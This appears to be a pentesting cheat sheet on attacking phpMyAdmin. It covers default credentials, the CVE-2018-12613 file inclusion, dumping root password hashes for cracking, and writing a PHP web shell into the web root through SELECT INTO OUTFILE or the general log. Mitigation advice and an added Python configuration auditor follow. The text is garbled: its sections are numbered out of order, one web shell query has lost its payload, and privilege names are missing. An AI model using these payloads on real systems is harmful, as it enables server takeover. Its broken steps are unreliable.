
phpMyAdmin HackTricks (May 2026)

The following report outlines common exploitation techniques for phpMyAdmin, based on security research and the HackTricks methodology.

1. Initial Access and Reconnaissance

  • Default Credentials: Attackers frequently check for default or weak credentials (e.g., with no password).
  • Version Identification: Identifying the specific phpMyAdmin version is critical, as many older versions are vulnerable to public Remote Code Execution (RCE) exploits.
  • URL Obfuscation: Securing an instance often involves changing the default /phpmyadmin URL to prevent automated discovery. (Exploit-DB)

2. Privilege Escalation & Data Exfiltration

  • Arbitrary File Read: Vulnerabilities like CVE-2018-12613 allow attackers to include files from the server, potentially exposing sensitive /etc/passwd or configuration files via local file inclusion (LFI).
  • Database Dumping: Once authenticated, attackers can use the Export tab to dump entire databases in formats like SQL, CSV, or XML for offline analysis. (Exploit-DB)

3. Post-Exploitation: Gaining a Web Shell

If the database user has sufficient permissions (e.g., privilege), attackers can move from database access to full server compromise:

  • General Log Shell:
      1. Enable the general log: SET GLOBAL general_log = 'ON';
      2. Set the log file path to a web-accessible directory: SET GLOBAL general_log_file = '/var/www/html/shell.php';
      3. Execute a query containing PHP code: SELECT "";
      4. Access the log file via a browser to execute commands.
  • Slow Query Log Shell: Similar to the general log method, but uses slow_query_log_file to hide the payload in a file that only records long-running queries.

4. Mitigation and Best Practices

To protect phpMyAdmin instances, industry experts recommend:

  • Restricting Access: Use IP whitelisting or place the interface behind a VPN.
  • Two-Factor Authentication: Enable 2FA to prevent credential stuffing.
  • File Permissions: Ensure the database user does not have privileges unless absolutely necessary.
  • Regular Updates: Keep phpMyAdmin updated to the latest stable release to patch known RCE vulnerabilities.


4. Authentication Bypass (Historical CVEs)

| CVE | Impact | Fixed in |
|-----|--------|----------|
| CVE-2016-5734 | Brute force using $cfg['AllowArbitraryServer'] | 4.6.3 |
| CVE-2018-12613 | File inclusion via target=db_sql.php?/../../ | 4.8.1 |
| CVE-2019-12922 | CSRF + RCE | 4.9.0.1 |

Check whether config.inc.php contains $cfg['AllowArbitraryServer'] = true; this setting allows an attacker to connect to external MySQL servers.

1. Extract MySQL Root Hash

SELECT authentication_string FROM mysql.user WHERE user='root';

Crack with Hashcat mode 7400 (MySQL 5.6+) or 300 (pre-4.1).

3.1 SELECT INTO OUTFILE – Classic Webshell

The oldest trick: write a PHP shell into the web root.

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Requirements:

  • MySQL secure_file_priv empty or pointing to web root.
  • Write permissions on target directory.

Check secure_file_priv:

SHOW VARIABLES LIKE "secure_file_priv";
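
As an added example (not part of the original page, and not phpMyAdmin or MySQL code), a defender-side audit of the settings named above: it flags AllowArbitraryServer in a config.inc.php body and checks secure_file_priv, general_log_file and slow_query_log_file against the web root. The web root /var/www/html, the extension list, the function names, the extra AllowNoPassword check and the sample inputs are assumptions made for illustration.

```python
import re
from pathlib import PurePosixPath

WEB_ROOT = PurePosixPath("/var/www/html")  # assumption: web root from this page's examples
SCRIPT_EXT = {".php", ".phtml", ".phar"}   # assumption: extensions the PHP handler executes

# Uncommented lines such as:  $cfg['AllowArbitraryServer'] = true;
CFG_TRUE = re.compile(
    r"^\s*\$cfg(?:\[[^\]]+\])*\['(AllowArbitraryServer|AllowNoPassword)'\]\s*=\s*true\s*;",
    re.IGNORECASE | re.MULTILINE,
)

def under_web_root(path: str) -> bool:
    p = PurePosixPath(path)
    return p == WEB_ROOT or WEB_ROOT in p.parents

def audit_config(text: str) -> list[str]:
    """Return the risky directives that a config.inc.php body sets to true."""
    return sorted({m.group(1) for m in CFG_TRUE.finditer(text)})

def audit_variables(variables: dict) -> list[str]:
    """Flag MySQL variables that let the server write files the web server would run."""
    findings = []
    sfp = variables.get("secure_file_priv")  # None models SQL NULL (import/export disabled)
    if sfp == "":
        findings.append("secure_file_priv is empty: file export is unrestricted")
    elif sfp is not None and under_web_root(sfp):
        findings.append("secure_file_priv points inside the web root")
    for name in ("general_log_file", "slow_query_log_file"):
        value = variables.get(name) or ""
        if under_web_root(value) or PurePosixPath(value).suffix.lower() in SCRIPT_EXT:
            findings.append(f"{name} is web-reachable or script-typed: {value}")
    return findings

# Constructed sample inputs (not taken from a real host).
SAMPLE_CONFIG = """\
$cfg['blowfish_secret'] = 'constructed-sample-value';
// $cfg['Servers'][$i]['AllowNoPassword'] = true;
$cfg['AllowArbitraryServer'] = true;
"""
SAMPLE_VARS = {
    "secure_file_priv": "",
    "general_log_file": "/var/www/html/shell.php",
    "slow_query_log_file": "/var/lib/mysql/db-slow.log",
}

if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG) + audit_variables(SAMPLE_VARS):
        print("FINDING:", finding)
```

On a live system, pass audit_variables the name/value pairs returned by SHOW VARIABLES, with SQL NULL mapped to None.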

2. Credential Reuse from Other Breaches

If you have retrieved hashes from /.git/config, .env, or backup files, try reusing those passwords here.